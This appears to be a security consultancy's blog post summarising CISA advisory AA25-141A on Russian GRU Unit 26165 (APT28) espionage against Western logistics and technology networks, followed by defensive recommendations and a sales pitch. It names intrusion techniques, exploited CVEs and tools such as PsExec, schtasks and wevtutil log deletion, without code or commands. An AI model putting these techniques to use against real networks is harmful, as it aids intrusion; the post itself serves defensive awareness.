Embedded Access: GRU Unit 26165 Targeting Western Logistics and Tech Infrastructure

On May 21, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with allied partners, issued Advisory AA25-141A. It confirms an ongoing cyberespionage campaign by Russia’s GRU Unit 26165 (APT28, also known as Fancy Bear), targeting logistics and technology networks directly tied to Western support for Ukraine.

This is not speculative. These actors are inside operational networks right now.

Targets and Operational Focus

Since early 2022, Russian military cyber units have been collecting intelligence on:

• Defense and weapons logistics

• Commercial shipping and air cargo

• Port, rail, and airport infrastructure

• Maritime tracking systems and ATC

• IT services supporting NATO-aligned missions

Compromised entities span the U.S., Germany, Poland, Romania, Czech Republic, Moldova, France, Italy, and more (CISA Advisory; Critical Path Security).

Tactics and Toolsets

GRU’s cyber operators are using reliable, well-obfuscated tools to access and persist inside these networks.

Initial Access Techniques

• Brute force and credential stuffing through anonymized nodes (Tor, commercial VPNs)

• Spearphishing with spoofed Microsoft 365 login portals

• Exploits: CVE-2023-23397 (Outlook NTLM leak), CVE-2023-38831 (WinRAR archive vulnerability)

Post-Compromise Activity

• Impacket and PsExec for lateral movement

• Scheduled tasks created via schtasks

• OpenSSH and remote desktop protocols tunneled over non-standard ports

Exfiltration Tactics

• Shared mailbox access for persistent surveillance

• Log deletion using wevtutil

• Data exfil via encrypted SSH tunnels (CISA)

Strategic Implications

This campaign is about visibility, not disruption—yet. GRU is watching the flow of Western materiel, aid, and information. By targeting logistics and IT backbone infrastructure, they gain pre-crisis access and leverage.

This is classic pre-positioning. Map the routes now. Decide when to strike later.

The most affected sectors are:

• Third-party logistics (3PLs)

• Defense contractors and subcontractors

• Telecom and hosting providers

• Cloud-based IT service firms

If your network touches movement, weapons, or bandwidth to Ukraine—you are a live target.

Cheshire Recommendations

1. Audit and hunt for known TTPs and IOCs Use the full IOC list provided in AA25-141A and from NSA/FBI advisories.

2. Segment communications systems from operational networks Treat systems used for partner coordination as high-side.

3. Lock down external IT providers Several breaches exploited third-party access paths (Critical Path).

4. Use strict access controls and 2FA on all remote systems Credential reuse and poor MFA are still the weakest links.

5. Establish direct communication with CISA and FBI These campaigns are not isolated. Intelligence sharing is part of the mitigation strategy (CISA ShieldUp).

At Cheshire Institute, we don’t treat these campaigns as IT problems. We treat them as what they are—intelligence operations.

If your organization is moving critical goods or providing enabling services, your threat surface includes state actors. We help you map it, contain it, and prepare for escalation.

You are not just supporting logistics. You are part of the operating picture.